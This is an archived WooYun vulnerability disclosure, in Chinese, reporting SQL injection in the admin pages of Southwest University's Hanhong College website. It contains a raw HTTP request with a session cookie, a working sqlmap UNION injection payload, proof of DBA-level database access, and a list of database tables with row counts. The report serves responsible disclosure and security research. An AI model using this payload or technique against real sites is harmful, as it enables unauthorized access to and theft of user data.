乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-27: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT多处存在注入,多处存在注入,多处存在注入,太多了,举一个。
http://hanhong.swu.edu.cn/ 西南大学含弘学院
GET /admin/xuesheng_add.php?id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20id%20in%20%3Cb%3E/opt/lampp/htdocs/admin/xuesheng.php%3C/b%3E%20on%20line%20%3Cb%3E109%3C/b%3E%3Cbr%20/%3E&name=-1&nianfen=2015 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://hanhong.swu.edu.cnCookie: PHPSESSID=qg09on74i0001f1l8tlvv64ai7Host: hanhong.swu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
name参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: name (GET) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=<br /><b>Notice</b>: Undefined variable: id in <b>/opt/lampp/htdocs/admin/xuesheng.php</b> on line <b>109</b><br />&name=-1' UNION ALL SELECT NULL,CONCAT(0x717a706271,0x434f6671537576784f76565049554f62784a59666853777563714676696467546547447461744b74,0x7171627671),NULL-- -&nianfen=2015---web application technology: PHP 5.6.8, Apache 2.4.12back-end DBMS: MySQL 5.1current user: 'hanhong@localhost'current database: 'hanhong'current user is DBA: Trueavailable databases [7]:[*] cdcol[*] hanhong[*] information_schema[*] mysql[*] performance_schema[*] phpmyadmin[*] test
根本就是没有防注入,类型有多种,为了快,就选了UNION query
Database: hanhong+-------------------------------+---------+| Table | Entries |+-------------------------------+---------+| common_member_count | 34117 || common_member_status | 34117 || common_member_log | 34109 || ucenter_memberfields | 31900 || common_credit_rule_log | 26457 || forum_statlog | 20352 || common_onlinetime | 19901 || common_district | 2677 || home_friendlog | 2616 || common_member_verify | 2293 || home_friend | 1671 || home_pokearchive | 1498 || home_clickuser | 1310 || common_stat | 865 || forum_post_tableid | 859 || common_credit_rule_log_field | 822 || home_poke | 806 || home_doing | 746 || common_member_field_forum | 556 || home_notification | 540 || home_docomment | 453 || home_picfield | 452 || register_student | 434 || forum_pollvoter | 393 || common_setting | 350 || home_pic | 334 || xsbmxx | 306 || forum_polloption | 272 || forum_spacecache | 272 || link | 247 || home_friend_request | 241 || ucenter_notelist | 232 || forum_debatepost | 206 || home_share | 205 || common_member_profile | 182 || common_stylevar | 180 || content | 179 || forum_thread | 137 || common_member | 127 || ucenter_members | 125 || forum_postcomment | 124 || home_class | 121 || home_comment | 113 || common_member_validate | 109 || common_block_style | 104 || common_syscache | 88 || common_smiley | 82 || forum_post | 76 || home_blog | 69 || common_block | 67 || common_template_block | 67 || ucenter_pms | 67 || common_admincp_perm | 63 || common_member_field_home | 63 || forum_poll | 63 || home_blogfield | 62 || forum_forumfield | 56 || forum_forum | 55 || forum_attachment | 52 || forum_attachmentfield | 51 || home_feed | 50 || common_member_profile_setting | 49 || common_nav | 36 || forum_memberrecommend | 34 || common_credit_rule | 29 || forum_modwork | 29 || home_album | 28 || common_credit_log | 26 || ucenter_settings | 25 || common_magic | 24 || home_visitor | 21 || common_usergroup | 19 || common_usergroup_field | 19 || list | 18 || forum_moderator | 17 || forum_activity | 15 || forum_activityapply | 15 || home_click | 15 || common_cron | 12 || forum_medal | 10 || home_favorite | 10 || forum_trade | 8 || admintea | 7 || common_admingroup | 7 || forum_postposition | 7 || forum_typeoption | 6 || ucenter_newpm | 6 || common_admincp_cmenu | 5 || common_admincp_group | 5 || forum_debate | 5 || common_regip | 4 || common_style | 4 || forum_bbcode | 4 || forum_onlinelist | 4 || forum_grouplevel | 3 || forum_imagetype | 3 || ucenter_admins | 3 || common_admincp_session | 2 || common_friendlink | 2 || common_magiclog | 2 || common_statuser | 2 || common_template | 2 || forum_tradelog | 2 || common_failedlogin | 1 || common_member_verify_info | 1 || common_secquestion | 1 || system | 1 || ucenter_applications | 1 || ucenter_failedlogins | 1 |+-------------------------------+---------+
信息获取基本没难度...DBA权限,你懂的,
最后提醒下,多处SQL
危害等级:中
漏洞Rank:9
确认时间:2015-11-27 15:12
已通知责任单位,谢谢!
暂无